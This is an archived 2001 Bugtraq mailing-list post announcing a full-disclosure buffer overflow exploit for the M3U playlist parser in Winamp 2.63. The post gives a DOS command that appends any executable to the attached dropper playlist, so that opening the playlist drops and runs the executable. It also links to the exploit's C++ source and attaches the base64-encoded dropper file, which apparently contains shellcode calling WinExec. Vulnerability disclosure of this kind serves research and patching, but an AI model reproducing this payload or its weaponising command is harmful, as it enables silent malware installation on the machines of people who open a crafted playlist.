[19982] in bugtraq
Winamp 2.63 full disclosure exploit
daemon@ATHENA.MIT.EDU (ByteRage)
Sun Apr 1 13:15:55 2001
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="0-1892066601-986129809=:61574"
Message-ID: <20010401125649.62154.qmail@web13008.mail.yahoo.com>
Date: Sun, 1 Apr 2001 05:56:49 -0700
Reply-To: ByteRage <byterage@YAHOO.COM>
From: ByteRage <byterage@YAHOO.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
--0-1892066601-986129809=:61574
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Hi all,
I have written a full disclosure buffer overflow
exploit for the winamp 2.63 buffer overflow found in
the M3U file parser...
Attached is a file called DROPPER.M3U, if you execute
the following commands in dos :
COPY /B DROPPER.M3U+C:\WINDOWS\CDPLAYER.EXE HACKME.M3U
when you click HACKME.M3U, the file will drop and
execute the appended exe file, CDPLAYER.EXE in this
case...
The CPP source for creating DROPPER.M3U is @
http://elf.box.sk/byterage/wa263bof.cpp
and more info can be got from
http://elf.box.sk/byterage/wa263.htm
I havent tested the exploit yet on 2.64 or underlying
versions, but if the versions of IN_MOD.DLL match,
those versions are vulnerable too...
greetz,
[ByteRage] http://elf.box.sk/byterage/
__________________________________________________
Do You Yahoo!?
Get email at your own domain with Yahoo! Mail.
http://personal.mail.yahoo.com/?.refer=text
--0-1892066601-986129809=:61574
Content-Type: audio/mpegurl; name="dropper.m3u"
Content-Transfer-Encoding: base64
Content-Description: dropper.m3u
Content-Disposition: attachment; filename="dropper.m3u"
I0VYVE0zVQ0KI0VYVElORjpYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhY
WFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhY
WFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhY
WFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhY
WFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhY
WFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhY
WFhYWFhYWFhYWFhYWFhYWBCgERFYWFhYK4MREZCQM8BQNIBQagM0gFBqAzSA
weAYUFP/FWiQERGL6DPJUVOxA8HhCFGDwwRTUP8VxJARETPJsX+AwX+DwW8D
2f/TDQqQkFOL+4HD8wAAAIHHEgEAAFP/FVSQERGL8DPA10M8AHX4U1b/FViQ
ERGrM8DXQzwAdfgzwNdDPAF01jwCdONoAEAAAGpA/1f4PQAAAAB0AJYzwFA0
gFBqAjPAUFBoAAAAwFf/FWiQERE9/////3QAk2oAV2gAQAAAVlX/FcSQERGD
PwB0D2oAV/83VlP/FdSQERHr3FP/FSiQERHHB1xFWFBqAVf/V/xqAP8VyJAR
EZCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJBLRVJORUwzMgBHbG9iYWxBbGxvYwAC
V2luRXhlYwAAAAAAAAAAAABcRVhQTE9JVC5FWEUAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
--0-1892066601-986129809=:61574--
